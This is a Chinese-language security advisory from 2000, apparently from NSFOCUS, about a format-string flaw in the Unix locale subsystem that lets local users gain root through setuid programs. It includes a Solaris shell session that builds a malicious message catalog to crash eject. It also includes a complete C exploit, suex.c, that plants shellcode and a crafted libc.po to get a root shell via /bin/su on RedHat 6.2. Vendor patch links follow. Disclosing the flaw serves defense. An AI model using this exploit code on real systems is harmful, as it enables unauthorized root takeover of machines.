安全研究
安全漏洞
很多Unix系统的Locale子系统存在格式串漏洞
发布日期:2000-09-05
更新日期:2000-09-08
受影响系统:
描述:
Connectiva Linux 5.1
Connectiva Linux 5.0
Connectiva Linux 4.2
Connectiva Linux 4.1
Connectiva Linux 4.0
Debian Linux 2.3
Debian Linux 2.2
Debian Linux 2.1
Debian Linux 2.0
RedHat Linux 6.2
RedHat Linux 6.1
RedHat Linux 6.0
RedHat Linux 5.2
RedHat Linux 5.1
RedHat Linux 5.0
SGI IRIX 6.5.x
SGI IRIX 6.5
SGI IRIX 6.4
SGI IRIX 6.3
SGI IRIX 6.2
Sun Solaris 8.0
Sun Solaris 7.0
Sun Solaris 2.6
Sun Solaris 2.5.1
Sun Solaris 2.x
根据X/Open XPG3, XPG4 和Sun/Uniforum规范, 很多UNIX操作系统提供了一个国际化支持:
locale子系统。locale子系统由一系列存储语言和国家信息的数据库组成,它也包含一套
库函数用来对这些信息进行存取和管理。
其中的一个数据库包含的消息几乎为所有的操作系统所用,因此每种所支持的语言都保留了
这个数据库。程序使用gettext,dgettext,dcgettext(如果使用的是Sun/Uniforum规范)或者
catopen,catgets,catclose( 如果使用的是X/Open XPG3 和 XPG4规范)来访问这个数据库。
通常一个程序需要向用户显示一条消息时,它会使用这条消息作为关键字从这个数据库中搜
索,并将得到的消息(使用正确的语言)用printf()函数族显示出来。通过创建一个特定的
消息数据库,攻击者可以控制查询函数的输出并将它传递给printf函数。
如果程序存在错误的编程习惯,就有可能将格式化串提供给printf函数,攻击者有可能利用
系统中的任意SUID程序获取root权限。
在某些操作系统中,攻击者可能利用传递telnetd的环境变量来进行这种攻击,但他必须首先
能够在目标主机上放置合适的消息数据库。由于Linux系统中使用的glibc存在另外一个安全
漏洞,二者结合起来,攻击者就可以成功的攻击系统。
(RedHat 开始提供的for 6.x的补丁程序可能导致JDK等应用程序出错,因此,他们又再次升级
glibc到2.1.3-21,参见后面解决方法。)
<* 来源:Ivan Arce (iarce@core-sdi.com)
Buenos Aires
Argentina
zenith parsec (zenith_parsec@the-astronaut.com)
Jouko Pynn鰊en (jouko@solutions.fi)
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
$ uname -a
SunOS maul 5.7 Generic_106541-02 sun4m Sparc SUNW,SPARCstation-5
$ ls -l
$ ls -l /usr/bin/eject
-r-sr-xr-x 1 root bin 14352 Oct 6 1998 /usr/bin/eject
$ eject -x`perl -e 'print "ABCDEF". "A"x507`
eject: illegal option -- x
usage: eject [-fndq] [name | nickname]
options: -f force eject
-n show nicknames
-d show default device
-q query for media present
-p do not call eject_popup
$ cat >doit.sh
#!/bin/ksh
export NLSPATH=:`pwd`
echo domain \"messages\" > messages.po
echo msgid \""usage: %s [-fndq] [name | nickname]\\\n"\" >> messages.po
echo msgstr \"`perl -e 'print "%x"x112 . "%n"'`\" >> messages.po
msgfmt messages.po
cp messages.mo SUNW_OST_OSCMD
cp messages.mo SUNW_OST_OSLIB
exec eject -x`perl -e 'print "ABCDEF" . "A"x507'`
^D
$ ./doit.sh
eject: illegal option -- x
ffbefbd07efefeff1ff00ff3358b8ffbefbd0000000ff3dc9042ffbefafc129642326c00ffbefa981
15083ffbefafc4ffbefb085ffbefb54002ffbefafcffbefb0823000000000000000000000002ffbef
bd0ffbefbd60ffbefddaffbefde7ffbefe06ffbefea1ffbefeb2ffbefecaffbefee4ffbefef6ffbef
f04ffbeff0cffbeff26ffbeff35ffbeff64ffbeff76ffbeff91ffbeff9cffbeffb6ffbeffd407d8ff
beffdb7deffbeffeb3100344205591142c7ff3b00008300620007d007d1647d217d317d97000656a6
56374002d78414243444546414141414141Bus Error
$ exit
NSFOCUS 提供了一个Linux下的测试程序:
[----------------------------suex.c------------------------------------]
/* exploit for glibc/locale format strings bug.
* Tested in RedHat 6.2 with kernel 2.2.16.
* Script kiddies: you should modify this code
* slightly by yourself. :)
*
* Greets: Solar Designer, Jouko Pynnvnen , zenith parsec
*
* THIS CODE IS FOR EDUCATIONAL PURPOSE ONLY AND SHOULD NOT BE RUN IN
* ANY HOST WITHOUT PERMISSION FROM THE SYSTEM ADMINISTRATOR.
*
* by warning3@nsfocus.com (http://www.nsfocus.com)
* y2k/9/6
*/
#include <stdlib.h>
#include <stdio.h>
#include <unistd.h>
#define DEFAULT_OFFSET 550
#define DEFAULT_ALIGNMENT 2
#define DEFAULT_RETLOC 0xbfffd2ff
#define DEFAULT_BUFFER_SIZE 2048
#define DEFAULT_EGG_SIZE 1024
#define NOP 0x90
#define PATH "/tmp/LC_MESSAGES"
char shellcode[] =
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";
unsigned long get_esp(void) {
__asm__("movl %esp,%eax");
}
main(int argc, char *argv[]) {
char *buff, *buff1, *ptr, *egg;
char *env[3];
long shell_addr,retloc=DEFAULT_RETLOC,tmpaddr;
int offset=DEFAULT_OFFSET, align=DEFAULT_ALIGNMENT;
int bsize=DEFAULT_BUFFER_SIZE, eggsize=DEFAULT_EGG_SIZE;
int i,reth,retl,num=113;
FILE *fp;
if (argc > 1) sscanf(argv[1],"%x",&retloc);
if (argc > 2) offset = atoi(argv[2]);
if (argc > 3) num = atoi(argv[3]);
if (argc > 4) align = atoi(argv[4]);
if (argc > 5) bsize = atoi(argv[5]);
if (argc > 6) eggsize = atoi(argv[6]);
printf("Usages: %s <RETloc> <offset> <num> <align> <buffsize> <eggsize> \n",argv[0]);
if (!(buff = malloc(eggsize))) {
printf("Can't allocate memory.\n");
exit(0);
}
if (!(buff1 = malloc(bsize))) {
printf("Can't allocate memory.\n");
exit(0);
}
if (!(egg = malloc(eggsize))) {
printf("Can't allocate memory.\n");
exit(0);
}
printf("Using RET location address: 0x%x\n", retloc);
shell_addr = get_esp() + offset;
printf("Using Shellcode address: 0x%x\n", shell_addr);
reth = (shell_addr >> 16) & 0xffff ;
retl = (shell_addr >> 0) & 0xffff ;
ptr = buff;
for (i = 0; i <2 ; i++, retloc+=2 ){
memset(ptr,'A',4);
ptr += 4 ;
(*ptr++) = retloc & 0xff;
(*ptr++) = (retloc >> 8 ) & 0xff ;
(*ptr++) = (retloc >> 16 ) & 0xff ;
(*ptr++) = (retloc >> 24 ) & 0xff ;
}
memset(ptr,'A',align);
ptr = buff1;
for(i = 0 ; i < num ; i++ )
{
memcpy(ptr, "%.8x", 4);
ptr += 4;
}
sprintf(ptr, "%%%uc%%hn%%%uc%%hn",(retl - num*8),
(0x10000 + reth - retl));
mkdir(PATH,0755);
chdir(PATH);
fp = fopen("libc.po", "w+");
fprintf(fp,"msgid \"%%s: invalid option -- %%c\\n\"\n");
fprintf(fp,"msgstr \"%s\\n\"", buff1);
fclose(fp);
system("/usr/bin/msgfmt libc.po -o libc.mo");
ptr = egg;
for (i = 0; i < eggsize - strlen(shellcode) - 1; i++)
*(ptr++) = NOP;
for (i = 0; i < strlen(shellcode); i++)
*(ptr++) = shellcode[i];
egg[eggsize - 1] = '\0';
memcpy(egg, "EGG=", 4);
env[0] = egg ;
env[1] = "LANGUAGE=sk_SK/../../../../../../tmp";
env[2] = (char *)0 ;
execle("/bin/su","su","-u", buff, NULL,env);
} /* end of main */
建议:
厂商补丁:
一些Linux厂商已经提供了相应的补丁:
[CONECTIVA LINUX]
ftp://atualizacoes.conectiva.com.br/4.0/SRPMS/glibc-2.1.2-13cl.src.rpm
ftp://atualizacoes.conectiva.com.br/4.0/i386/glibc-2.1.2-13cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.0/i386/glibc-devel-2.1.2-13cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.0/i386/glibc-profile-2.1.2-13cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.0/i386/nscd-2.1.2-13cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.0es/SRPMS/glibc-2.1.2-13cl.src.rpm
ftp://atualizacoes.conectiva.com.br/4.0es/i386/glibc-2.1.2-13cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.0es/i386/glibc-devel-2.1.2-13cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.0es/i386/glibc-profile-2.1.2-13cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.0es/i386/nscd-2.1.2-13cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.1/SRPMS/glibc-2.1.2-13cl.src.rpm
ftp://atualizacoes.conectiva.com.br/4.1/i386/glibc-2.1.2-13cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.1/i386/glibc-devel-2.1.2-13cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.1/i386/glibc-profile-2.1.2-13cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.1/i386/nscd-2.1.2-13cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.2/SRPMS/glibc-2.1.2-13cl.src.rpm
ftp://atualizacoes.conectiva.com.br/4.2/i386/glibc-2.1.2-13cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.2/i386/glibc-devel-2.1.2-13cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.2/i386/glibc-profile-2.1.2-13cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.2/i386/nscd-2.1.2-13cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/5.0/SRPMS/glibc-2.1.3-9cl.src.rpm
ftp://atualizacoes.conectiva.com.br/5.0/i386/glibc-2.1.3-9cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/5.0/i386/glibc-devel-2.1.3-9cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/5.0/i386/glibc-profile-2.1.3-9cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/5.0/i386/nscd-2.1.3-9cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/5.1/SRPMS/glibc-2.1.3-9cl.src.rpm
ftp://atualizacoes.conectiva.com.br/5.1/i386/glibc-2.1.3-9cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/5.1/i386/glibc-devel-2.1.3-9cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/5.1/i386/glibc-profile-2.1.3-9cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/5.1/i386/nscd-2.1.3-9cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/ferramentas/ecommerce/SRPMS/glibc-2.1.3-9cl.src.rpm
ftp://atualizacoes.conectiva.com.br/ferramentas/ecommerce/i386/glibc-2.1.3-9cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/ferramentas/ecommerce/i386/glibc-devel-2.1.3-9cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/ferramentas/ecommerce/i386/glibc-profile-2.1.3-9cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/ferramentas/ecommerce/i386/nscd-2.1.3-9cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/ferramentas/graficas/SRPMS/glibc-2.1.3-9cl.src.rpm
ftp://atualizacoes.conectiva.com.br/ferramentas/graficas/i386/glibc-2.1.3-9cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/ferramentas/graficas/i386/glibc-devel-2.1.3-9cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/ferramentas/graficas/i386/glibc-profile-2.1.3-9cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/ferramentas/graficas/i386/nscd-2.1.3-9cl.i386.rpm
[Debian Linux]
Debian GNU/Linux 2.2 alias potato
- ------------------------------------
Source archives:
http://security.debian.org/dists/stable/updates/main/source/glibc_2.1.3-13.diff.gz
http://security.debian.org/dists/stable/updates/main/source/glibc_2.1.3-13.dsc
http://security.debian.org/dists/stable/updates/main/source/glibc_2.1.3.orig.tar.gz
http://security.debian.org/dists/stable/updates/main/binary-all/glibc-doc_2.1.3-13_all.deb
http://security.debian.org/dists/stable/updates/main/binary-all/i18ndata_2.1.3-13_all.deb
Alpha 平台:
http://security.debian.org/dists/stable/updates/main/binary-alpha/libc6.1-dbg_2.1.3-13_alpha.deb
http://security.debian.org/dists/stable/updates/main/binary-alpha/libc6.1-dev_2.1.3-13_alpha.deb
http://security.debian.org/dists/stable/updates/main/binary-alpha/libc6.1-pic_2.1.3-13_alpha.deb
http://security.debian.org/dists/stable/updates/main/binary-alpha/libc6.1-prof_2.1.3-13_alpha.deb
http://security.debian.org/dists/stable/updates/main/binary-alpha/libc6.1_2.1.3-13_alpha.deb
http://security.debian.org/dists/stable/updates/main/binary-alpha/libnss1-compat_2.1.3-13_alpha.deb
http://security.debian.org/dists/stable/updates/main/binary-alpha/locales_2.1.3-13_alpha.deb
http://security.debian.org/dists/stable/updates/main/binary-alpha/nscd_2.1.3-13_alpha.deb
ARM 平台:
http://security.debian.org/dists/stable/updates/main/binary-arm/libc6-dbg_2.1.3-13_arm.deb
http://security.debian.org/dists/stable/updates/main/binary-arm/libc6-dev_2.1.3-13_arm.deb
http://security.debian.org/dists/stable/updates/main/binary-arm/libc6-pic_2.1.3-13_arm.deb
http://security.debian.org/dists/stable/updates/main/binary-arm/libc6-prof_2.1.3-13_arm.deb
http://security.debian.org/dists/stable/updates/main/binary-arm/libc6_2.1.3-13_arm.deb
http://security.debian.org/dists/stable/updates/main/binary-arm/locales_2.1.3-13_arm.deb
http://security.debian.org/dists/stable/updates/main/binary-arm/nscd_2.1.3-13_arm.deb
Intel ia32 平台:
http://security.debian.org/dists/stable/updates/main/binary-i386/libc6-dbg_2.1.3-13_i386.deb
http://security.debian.org/dists/stable/updates/main/binary-i386/libc6-dev_2.1.3-13_i386.deb
http://security.debian.org/dists/stable/updates/main/binary-i386/libc6-pic_2.1.3-13_i386.deb
http://security.debian.org/dists/stable/updates/main/binary-i386/libc6-prof_2.1.3-13_i386.deb
http://security.debian.org/dists/stable/updates/main/binary-i386/libc6_2.1.3-13_i386.deb
http://security.debian.org/dists/stable/updates/main/binary-i386/libnss1-compat_2.1.3-13_i386.deb
http://security.debian.org/dists/stable/updates/main/binary-i386/locales_2.1.3-13_i386.deb
http://security.debian.org/dists/stable/updates/main/binary-i386/nscd_2.1.3-13_i386.deb
PowerPC 平台:
http://security.debian.org/dists/stable/updates/main/binary-powerpc/libc6-dbg_2.1.3-13_powerpc.deb
http://security.debian.org/dists/stable/updates/main/binary-powerpc/libc6-dev_2.1.3-13_powerpc.deb
http://security.debian.org/dists/stable/updates/main/binary-powerpc/libc6-pic_2.1.3-13_powerpc.deb
http://security.debian.org/dists/stable/updates/main/binary-powerpc/libc6-prof_2.1.3-13_powerpc.deb
http://security.debian.org/dists/stable/updates/main/binary-powerpc/libc6_2.1.3-13_powerpc.deb
http://security.debian.org/dists/stable/updates/main/binary-powerpc/locales_2.1.3-13_powerpc.deb
http://security.debian.org/dists/stable/updates/main/binary-powerpc/nscd_2.1.3-13_powerpc.deb
Sun Sparc 平台:
http://security.debian.org/dists/stable/updates/main/binary-sparc/libc6-dbg_2.1.3-13_sparc.deb
http://security.debian.org/dists/stable/updates/main/binary-sparc/libc6-dev_2.1.3-13_sparc.deb
http://security.debian.org/dists/stable/updates/main/binary-sparc/libc6-pic_2.1.3-13_sparc.deb
http://security.debian.org/dists/stable/updates/main/binary-sparc/libc6-prof_2.1.3-13_sparc.deb
http://security.debian.org/dists/stable/updates/main/binary-sparc/libc6_2.1.3-13_sparc.deb
http://security.debian.org/dists/stable/updates/main/binary-sparc/locales_2.1.3-13_sparc.deb
http://security.debian.org/dists/stable/updates/main/binary-sparc/nscd_2.1.3-13_sparc.deb
[REDHAT LINUX]:
Red Hat Linux 5.x:
sparc:
ftp://updates.redhat.com/5.2/sparc/glibc-2.0.7-29.2.sparc.rpm
ftp://updates.redhat.com/5.2/sparc/glibc-debug-2.0.7-29.2.sparc.rpm
ftp://updates.redhat.com/5.2/sparc/glibc-devel-2.0.7-29.2.sparc.rpm
ftp://updates.redhat.com/5.2/sparc/glibc-profile-2.0.7-29.2.sparc.rpm
alpha:
ftp://updates.redhat.com/5.2/alpha/glibc-2.0.7-29.2.alpha.rpm
ftp://updates.redhat.com/5.2/alpha/glibc-debug-2.0.7-29.2.alpha.rpm
ftp://updates.redhat.com/5.2/alpha/glibc-devel-2.0.7-29.2.alpha.rpm
ftp://updates.redhat.com/5.2/alpha/glibc-profile-2.0.7-29.2.alpha.rpm
i386:
ftp://updates.redhat.com/5.2/i386/glibc-2.0.7-29.2.i386.rpm
ftp://updates.redhat.com/5.2/i386/glibc-debug-2.0.7-29.2.i386.rpm
ftp://updates.redhat.com/5.2/i386/glibc-devel-2.0.7-29.2.i386.rpm
ftp://updates.redhat.com/5.2/i386/glibc-profile-2.0.7-29.2.i386.rpm
sources:
ftp://updates.redhat.com/5.2/SRPMS/glibc-2.0.7-29.2.src.rpm
Red Hat Linux 6.x:
sparc:
ftp://updates.redhat.com/6.2/sparc/glibc-2.1.3-21.sparc.rpm
ftp://updates.redhat.com/6.2/sparc/glibc-devel-2.1.3-21.sparc.rpm
ftp://updates.redhat.com/6.2/sparc/glibc-profile-2.1.3-21.sparc.rpm
ftp://updates.redhat.com/6.2/sparc/nscd-2.1.3-21.sparc.rpm
i386:
ftp://updates.redhat.com/6.2/i386/glibc-2.1.3-21.i386.rpm
ftp://updates.redhat.com/6.2/i386/glibc-devel-2.1.3-21.i386.rpm
ftp://updates.redhat.com/6.2/i386/glibc-profile-2.1.3-21.i386.rpm
ftp://updates.redhat.com/6.2/i386/nscd-2.1.3-21.i386.rpm
alpha:
ftp://updates.redhat.com/6.2/alpha/glibc-2.1.3-21.alpha.rpm
ftp://updates.redhat.com/6.2/alpha/glibc-devel-2.1.3-21.alpha.rpm
ftp://updates.redhat.com/6.2/alpha/glibc-profile-2.1.3-21.alpha.rpm
ftp://updates.redhat.com/6.2/alpha/nscd-2.1.3-21.alpha.rpm
sparcv9:
ftp://updates.redhat.com/6.2/sparcv9/glibc-2.1.3-21.sparcv9.rpm
sources:
ftp://updates.redhat.com/6.2/SRPMS/glibc-2.1.3-21.src.rpm
浏览次数:6488
严重程度:0(网友投票)
绿盟科技给您安全的保障